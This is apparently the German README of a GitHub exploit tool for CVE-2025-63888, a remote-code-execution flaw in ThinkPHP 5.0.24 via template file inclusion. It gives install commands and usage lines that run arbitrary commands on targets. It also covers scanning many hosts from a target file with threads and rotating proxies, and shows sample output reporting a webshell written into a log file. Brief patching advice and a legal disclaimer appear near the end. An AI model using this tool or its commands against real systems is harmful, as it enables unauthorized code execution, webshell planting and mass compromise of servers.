
Sicherheitsforschungstool zum Erkennen und Testen von CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability)
Ein Sicherheitsforschungswerkzeug zur Erkennung und Prüfung der CVE-2025-63888-Schwachstelle in ThinkPHP 5.0.24, die durch Datei-Inklusion Remote Code Execution ermöglicht.
Dieses Tool dient nur für autorisierte Sicherheitstests und Bildungszwecke. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.
CVE-2025-63888 ist eine kritische Remote Code Execution-Schwachstelle in ThinkPHP 5.0.24. Die Schwachstelle besteht in der read-Funktion in thinkphp/library/think/template/driver/File.php, die es Angreifern ermöglicht, durch Manipulation des Vorlagenpfads in der view()-Funktion beliebigen Code auszuführen.
CVSS-Score: 9,8 (Kritisch)
Betroffene Version: ThinkPHP 5.0.24 (exakte Version)
Angreifbare Datei: thinkphp/library/think/template/driver/File.php
-Methode
read()# Repository klonen
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit
# Abhängigkeiten installieren
pip install -r requirements.txt
# Skript ausführbar machen (optional)
chmod +x cve_2025_63888_exploit.py
# Skript herunterladen
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py
# Abhängigkeiten installieren
pip install requests
# Einzelnes Ziel
python3 cve_2025_63888_exploit.py -u http://target.com
# Eigenen Befehl ausführen
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"
# Mehrere Ziele aus Datei
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
# Mit Threading für schnelleres Scannen
python3 cve_2025_63888_exploit.py -u http://target.com -t 5
# Ausführliche Ausgabe zum Debuggen
python3 cve_2025_63888_exploit.py -u http://target.com -v
# Einzelner Proxy
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port
# Mehrere Proxys aus Datei
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
-u, --url Ziel-URL
-f, --file Datei mit Ziel-URLs (eine pro Zeile)
-c, --command Auszuführender Befehl (Standard: id)
-t, --threads Anzahl der Threads (Standard: 1)
-o, --output Ausgabedatei (Standard: uknf_results.json)
-v, --verbose Ausführliche Protokollierung aktivieren
--proxy Proxy-URL (z.B. http://127.0.0.1:8080)
--proxy-list Datei mit Proxy-URLs (eine pro Zeile)
Das Skript erzeugt eine JSON-Datei mit detaillierten Ergebnissen:
{
"target": "http://target.com",
"timestamp": "2025-11-20T15:05:35.763409",
"vulnerable": true,
"endpoint_found": true,
"exploitation_successful": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_endpoint": "/index.php/index/index/view",
"webshell_created": true,
"webshell_path": "../../../runtime/log/2025/11/18.log"
}
view()-FunktionWenn Sie ThinkPHP 5.0.24 verwenden:
Sofort aktualisieren:
Pfadvalidierung implementieren:
view()-Funktion hinzufügen../, ..)Code-Ebene-Fixes:
realpath() verwenden, um sicherzustellen, dass Dateien in erlaubten Verzeichnissen liegenpython3 cve_2025_63888_exploit.py -u https://example.com
# Zieldatei erstellen
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Scan ausführen
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"
# Einzelner Proxy
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Mehrere Proxys aus Datei
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt
Beiträge sind willkommen! Bitte reichen Sie einen Pull Request ein.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Wenn Sie auf Probleme stoßen oder Vorschläge haben, eröffnen Sie bitte ein Issue auf GitHub.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die LICENSE-Datei für Details.
Wenn Sie dieses Tool nützlich finden, erwägen Sie bitte, ihm auf GitHub einen Stern zu geben!
Dieses Tool wird nur zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Berechtigung verfügen.
Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Vielen Dank für Ihre Unterstützung! 🙏